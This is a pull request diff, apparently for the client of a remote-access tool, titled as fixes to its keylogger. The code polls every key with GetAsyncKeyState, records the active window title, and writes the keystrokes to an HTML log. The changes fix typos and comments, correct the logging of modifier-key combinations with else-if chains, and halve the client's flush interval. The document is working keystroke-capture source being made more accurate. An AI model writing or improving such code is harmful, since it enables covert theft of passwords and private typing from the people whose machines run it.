### PR TITLE
Fixes and improvements to the keylogger

### DIFF
--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -215,15 +215,15 @@ namespace xClient.Core.Keylogger
                                     {
                                         _logFileBuffer.Append(HighlightSpecialKey("SHIFT-CTRL-ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }
-                                    if (k.AltKey && k.ControlKey && !k.ShiftKey)
+                                    else if (k.AltKey && k.ControlKey && !k.ShiftKey)
                                     {
                                         _logFileBuffer.Append(HighlightSpecialKey("CTRL-ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }
-                                    if (k.AltKey && !k.ControlKey)
+                                    else if (k.AltKey && !k.ControlKey)
                                     {
                                         _logFileBuffer.Append(HighlightSpecialKey("ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }
-                                    if (k.ControlKey && !k.AltKey)
+                                    else if (k.ControlKey && !k.AltKey)
                                     {
                                         _logFileBuffer.Append(HighlightSpecialKey("CTRL-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }

--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -101,6 +101,10 @@ namespace xClient.Core.Keylogger
         private readonly System.Timers.Timer _timerLogKeys;
         private readonly System.Timers.Timer _timerFlush;
 
+        /// <summary>
+        /// Creates the logging class that provides keylogging functionality.
+        /// </summary>
+        /// <param name="flushInterval">The interval, in milliseconds, to flush the contents of the keylogger to the file.</param>
         public Logger(double flushInterval)
         {
             Instance = this;

--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -11,7 +11,7 @@ namespace xClient.Core.Keylogger
     public class KeyData
     {
         public short Value { get; set; }
-        public bool ShitKey { get; set; }
+        public bool ShiftKey { get; set; }
         public bool CapsLock { get; set; }
         public bool ControlKey { get; set; }
         public bool AltKey { get; set; }
@@ -157,7 +157,7 @@ namespace xClient.Core.Keylogger
             this._logFileBuffer = new StringBuilder();
         }
 
-        private string HighlightpecialKey(string name)
+        private string HighlightSpecialKey(string name)
         {
             return string.Format("<font color=\"0000FF\">[{0}]</font>", name);
         }
@@ -177,23 +177,23 @@ namespace xClient.Core.Keylogger
                         switch (k.Value)
                         {
                             case 8:
-                                _logFileBuffer.Append(HighlightpecialKey("Back"));
+                                _logFileBuffer.Append(HighlightSpecialKey("Back"));
                                 break;
                             case 9:
-                                _logFileBuffer.Append(HighlightpecialKey("Tab"));
+                                _logFileBuffer.Append(HighlightSpecialKey("Tab"));
                                 break;
                             case 13:
-                                _logFileBuffer.Append(HighlightpecialKey("Enter"));
+                                _logFileBuffer.Append(HighlightSpecialKey("Enter"));
                                 break;
                             case 32:
                                 _logFileBuffer.Append(" ");
                                 break;
                             case 46:
-                                _logFileBuffer.Append(HighlightpecialKey("Del"));
+                                _logFileBuffer.Append(HighlightSpecialKey("Del"));
                                 break;
                             case 91:
                             case 92:
-                                _logFileBuffer.Append(HighlightpecialKey("Win"));
+                                _logFileBuffer.Append(HighlightSpecialKey("Win"));
                                 break;
                             case 112:
                             case 113:
@@ -206,30 +206,30 @@ namespace xClient.Core.Keylogger
                             case 120:
                             case 121:
                             case 122:
-                                _logFileBuffer.Append(HighlightpecialKey("F" + (k.Value - 111)));
+                                _logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111)));
                                 break;
                             default:
                                 if (_enumValues.Contains(k.Value))
                                 {
-                                    if (k.AltKey && k.ControlKey && k.ShitKey)
+                                    if (k.AltKey && k.ControlKey && k.ShiftKey)
                                     {
-                                        _logFileBuffer.Append(HighlightpecialKey("SHIFT-CTRL-ALT-" + FromKeys(k.Value, k.ShitKey, k.CapsLock)));
+                                        _logFileBuffer.Append(HighlightSpecialKey("SHIFT-CTRL-ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }
-                                    if (k.AltKey && k.ControlKey && !k.ShitKey)
+                                    if (k.AltKey && k.ControlKey && !k.ShiftKey)
                                     {
-                                        _logFileBuffer.Append(HighlightpecialKey("CTRL-ALT-" + FromKeys(k.Value, k.ShitKey, k.CapsLock)));
+                                        _logFileBuffer.Append(HighlightSpecialKey("CTRL-ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }
                                     if (k.AltKey && !k.ControlKey)
                                     {
-                                        _logFileBuffer.Append(HighlightpecialKey("ALT-" + FromKeys(k.Value, k.ShitKey, k.CapsLock)));
+                                        _logFileBuffer.Append(HighlightSpecialKey("ALT-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }
                                     if (k.ControlKey && !k.AltKey)
                                     {
-                                        _logFileBuffer.Append(HighlightpecialKey("CTRL-" + FromKeys(k.Value, k.ShitKey, k.CapsLock)));
+                                        _logFileBuffer.Append(HighlightSpecialKey("CTRL-" + FromKeys(k.Value, k.ShiftKey, k.CapsLock)));
                                     }
                                     else
                                     {
-                                        _logFileBuffer.Append(FromKeys(k.Value, k.ShitKey, k.CapsLock));
+                                        _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock));
                                     }
                                 }
                                 break;
@@ -247,7 +247,7 @@ namespace xClient.Core.Keylogger
             {
                 if (GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress
                 {
-                    _keyBuffer.Add(new KeyData() {CapsLock = CapsLock, ShitKey = ShiftKey, ControlKey = ControlKey, AltKey = AltKey, Value = i});
+                    _keyBuffer.Add(new KeyData() {CapsLock = CapsLock, ShiftKey = ShiftKey, ControlKey = ControlKey, AltKey = AltKey, Value = i});
                     _hWndTitle = GetActiveWindowTitle(); //Get active thread window title
                     if (_hWndTitle != null)
                     {

--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -69,7 +69,7 @@ namespace xClient.Core.Keylogger
         {
             get
             {
-                return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if shiftkey is pressed
+                return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed
             }
         }
 
@@ -77,7 +77,7 @@ namespace xClient.Core.Keylogger
         {
             get
             {
-                return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if shiftkey is pressed
+                return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed
             }
         }
 

--- a/Client/Program.cs
+++ b/Client/Program.cs
@@ -131,7 +131,7 @@ namespace xClient
                 {
                     new Thread(() =>
                     {
-                        Logger logger = new Logger(30000) { Enabled = true };
+                        Logger logger = new Logger(15000) { Enabled = true };
                     }).Start();
                 }
             }


### PR DESCRIPTION
1) Fixed two typos.
2) Fixed an issue that caused incorrect logging of certain special key combinations.
3) Fixed incorrect documentation in the Keylogger.
4) Made the flush interval smaller for the client and added a bit of documentation to the Logger's constructor.